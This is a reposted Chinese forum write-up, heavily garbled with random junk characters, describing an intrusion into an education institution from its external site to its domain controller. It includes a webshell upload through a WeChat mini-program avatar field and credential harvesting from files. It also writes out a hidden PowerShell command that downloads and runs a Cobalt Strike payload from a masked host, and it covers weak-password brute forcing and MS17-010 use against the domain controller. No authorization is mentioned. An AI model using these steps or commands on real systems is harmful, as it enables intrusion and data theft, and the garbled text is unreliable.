|
! ]+ R5 L0 ?+ T" o
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
, d- d4 M1 q; ~: X
$ f' r$ F, F$ {! g, O) d9 |' z4 X+ }. q: T, h( ]" ~4 A
. c$ Q/ t$ K, @& d3 w/ t" j: V : _. _3 l' X7 y: a
/ o5 I" w/ r' e" {! r8 D( ^
正文3 U! a- y1 H) V
# ]' w; @$ X8 `; J
, E4 t8 X; ]( p
. ~) q$ [/ V/ b' L% [4 e+ n
; |: g( a; h) ^' t
0 i8 S& {. w4 ~) q% z ] 目标:www.xxxx.com(一家教育机构)
( p. {4 h4 i' o# E0 K, q: }打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
) g+ F" u$ ?# Q1 s B: S) K% p7 }6 v ( j( Q/ G) u: o: U+ b2 t
) ?' q0 B1 w0 ^" [; u# |4 Y' z
, q7 V. l$ J2 y
' h, l$ t8 s$ U
* I; G! g: D( G- `/ [3 }% R 进行了简单的信息搜集
9 D: H* O5 c6 q. d4 O & s& c& ~" ]) l: D/ E, P1 H+ J+ z
. u% J) `7 ~# Q# F/ }
% m6 B. ?0 V, U% @: X% J6 T5 g$ @4 n! f. d5 @! W& i
子域名搜集
% f# [, H& Q5 u# [. ^; l
" }: f5 ~- [$ X' z6 w u, E. ?- T. x( E) @/ U" ? A z, h) [4 V
; x% k9 x/ q) g1 I3 o5 o$ y: U% g
6 N6 I/ l& `, B) T
* s5 d N# L- [0 H4 r& A fofa找资产 ; h. h5 L3 V8 U2 [, b3 T
) \$ q( D3 |' S
' k) E1 n: E# }! w r
, g8 S1 \- k2 G3 g7 {1 e
& h7 z; F9 t# L7 d% b" o$ h& N
2 v/ S7 |6 N8 \ ) `+ |8 t8 {* }) h
- j* u! W6 k* e0 @1 w8 v
一共七个资产。去重之后只有两个。 ' T: X, K! z2 T! F
! _, t1 D3 o. ^" L- U w, h5 I
% Q7 w3 J4 Y+ i7 y) C6 ?& Z2 x
# |% ?) c! z1 K7 @, r8 p$ Q2 k
/ V; G9 [3 B5 e7 ]! z
目录探测0 l% f( N4 L9 a; \0 v" P' l% B
! h8 [# r) X. F
2 ~: }; ~2 ]& p: m+ y) G; F1 `8 @* L- B " d* w$ s! w9 h
. w% q/ f8 q" ]# u. X( @
8 L8 N& c1 R1 v: m: J: O 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
+ b; Y, C" z# H' \: p+ o/ f
2 f/ W7 G% ~( d! L1 o3 u- w$ J( R) Z$ I8 N* `' X: ^9 p- c& u
& E6 j: a+ H& e" t" y1 l2 j
' r' ~* k X/ B 我又尝试了通过修改返回包来绕过登录界面% ]# y0 U, X/ n4 I% G, |) @7 _
9 b: ]+ p6 ?1 X6 f& G
0 ~7 g4 ]! q0 e; j H 2 Z/ K, u6 j& }1 U8 c" G
- O5 ^' ^) f- w
- \& a6 V# A% M- \& |$ A/ P 还是不行,尝试注入无果
0 L- d' O, e6 w3 m
+ }3 H/ I1 \# S q7 m* d
% D8 O% z, i) L) t+ t8 H 4 B/ v* u0 Q4 Z- k# U" { D
$ ]9 z/ b3 e+ w3 G& I; ^9 h, ?
/ i/ G, |2 r6 r I6 N
不过我目录探测出了一处Spring信息泄露
* ]. S% `6 o: N' @ t" j * T2 ?7 V7 P' b s/ }# h
- u F# ~; X7 I- ]. C* E $ l( @, p/ x( d4 C. f) @* E( T) }& K
( G% x) ]% ]: E/ N7 [8 ?
# q. p0 E7 {4 r2 `
3 U1 C8 S! V: ~ u& o4 e0 K
& \) Z3 q( M' [+ w1 g) N& k 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
; h8 @$ b+ {$ b' N4 }: A
( T: N5 e' g5 `9 f% p
4 Z& K3 j9 [) S; i; m : ^' h7 v+ k' {1 n$ N$ h- x
2 \- C4 t& {8 d
, h. F2 p# f* f) f. @: A) o
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 Y) ^4 b& E C4 z8 W7 H0 G
0 K# _8 M( m) I+ m
( p/ W7 B. y/ R( s0 p $ }$ n& s# G/ }
0 j3 U# g- H5 d6 L1 m
9 C8 ?8 `# `: ?1 W a3 T* _" U# P: Q
获取有些师傅到这一步就手机抓包电脑测了。
$ W8 X$ j; F: `
% g! Q, `5 I0 r. D' b5 e
) ~. G8 u* L; b- g Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
; ?& Z+ Q6 r2 M; D 2 U% D5 V! o( @7 G* Q
/ h; R# O' c0 K: c" g7 g+ ` 其中在一个公众号发现了小程序,可以进行注册。
, U5 \9 u3 o" w' O 7 G; d4 z5 C$ A- S% I8 r& ^# D
* z) U' ` C1 g; {3 j3 L, k 看到了头像上传,尝试上传获取WebShell4 X$ b% r: E3 a1 H* j4 C. O7 L4 c8 ]
! _2 l/ Y" A5 x: I; h p% i; d" L0 ~+ x5 M
) m2 b8 D( T0 |7 m. ~) U
7 q/ N& Z/ n/ ?! f% _/ E3 b |. ?% ~2 R. j S
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
" A8 `3 I9 @1 Q6 J6 ] E; P
, b+ A" @$ R+ K o" ~. b" o7 N5 _/ w& u' a8 B4 [# E O H6 _
0 A3 X7 Q; A2 a$ v/ i/ n. V
; ~$ G: O z8 T1 E
% ]3 j- g2 B% W: l8 e, x5 J 然后上了大马
; F! \1 f2 s( H2 V8 C3 F; R' Z
& e4 m: d, M/ B; |5 K( `9 x2 d9 x" A3 t/ s: A& U
+ r# |/ }+ ^! N2 ~) \! B
' f; ?% `, J5 B: `+ K2 m
; ~3 q* N! r) j
% G: C a) F4 Q: l2 `
% l+ o7 q: L8 h% L6 @; M* n1 X
7 d& i4 ]4 h" x. ?+ O+ X* `' }0 c
通过翻找文件发现数据库账号密码
M3 u- |5 ]" |" `2 F5 G: p/ w
" Q& R( x7 L3 m5 [# T
- X+ j) C- C" E$ \5 K
+ `; l7 @9 P0 J$ |% b
8 x; }- a; E2 ?4 O5 H
3 P4 }3 ?" d5 ^! O --内网渗透; e4 v' W5 z2 y( b j
2 z' y) t9 H7 a, x( [8 V1 q
! h6 n$ }) @9 o 直接通过powershell执行 cs上线$ i6 O' K/ i& C# C4 `6 \( \* C
) v) f$ P1 v: h. M$ e. ?) ?
; s3 d$ M# ?2 t: o/ J. D powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"' N/ m, K5 h5 r) d! u
. E$ b6 m$ l: {' ?
3 c& V* J9 \8 @
% B U4 m5 Y( V, r% Y2 g6 ]: I0 i
2 W/ o% s; C4 g# w4 {2 L9 e% Q+ _# {7 f, I: |
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
/ e8 Z# T* P$ o5 y: i L4 C & r, `3 T5 ?7 n, U/ n/ Q# H
* Q& g- V: q; Q; c/ O* ? 3 B* p5 `" D. \8 D. _8 |* U1 h- c) |
7 ]+ ]8 L. f# l) ?
; ]0 z% H# {' D 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
" a+ K; U6 }# \; t0 T & G2 f9 I" F: ~
+ `1 e, w# K% Z; E1 E z
0 G6 @: y/ U/ s. Q) e4 a
- I- O1 \( \# _7 k* R. G% A2 @* x" y' X
- m6 ^3 q' f1 W$ |) i
, U; I) R; r }3 L$ d) w
# _% f- o- N; U2 O# C! M8 N 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 $ A; q, }! _! S
- t! m& Q" h+ p6 t- _* q& K
# l$ A9 f( R3 f k
: p5 @/ \; v$ \5 a* r3 T7 j
( V I5 B& D3 n4 ]! {' f
9 c/ f4 S' P7 E* K. e : T6 q. F) w, G7 p# p- c1 O6 a! }
8 y$ ^1 f0 F9 X) x6 Z: J
H8 p- e c( S) ~ a7 @* q
% x5 V1 E8 k6 t: }* ^1 S- \( d) h
, K. N( t# L) l $ V. b% W! N: s. r! x {1 S+ b/ u
& h3 F: J0 {8 E* T
* r/ B, E1 B) O) e1 k
. `1 [1 p, _3 K- L
* t5 C, R! D" @ 小结6 J0 C) B3 [+ [: O, ]
% e! f- N7 f3 n$ B' e
. a0 P4 r$ ~2 V4 C 6 f3 r! x. U( d# { R$ |
# i& v3 p {; a( H) j2 Y2 z
" m- y' J- J1 x$ G9 g 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!& h/ K. v0 e& v2 P
) F: L" \# B# E, Q; G5 f1 U% ], ^$ k& g* y' B9 W' R) [) V
* l" H6 u& P4 [$ Y e: b
+ d: U, I: S6 q) g9 g
; c/ E0 L6 ], x, V! v - ) N# D5 k- A% B& A/ F
. z" t" A) T2 ?0 T4 x: Z% x& t/ C
$ a R) t* _3 P1 q& V7 H
- + @ k: R! l0 ]; Y2 w4 N
, W1 ]; @0 w1 W4 M
+ `/ ]0 j, c; W) }5 ^# w
- `5 v/ J5 l, }4 `
. J0 U2 v& Y; E
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html' L; S) x# c* A$ m( W
' H' b* a8 Q1 _% d8 b9 ~
% a0 p8 b0 f4 W6 w0 n- L9 c
& C* J& K1 P( v2 t! e( G
|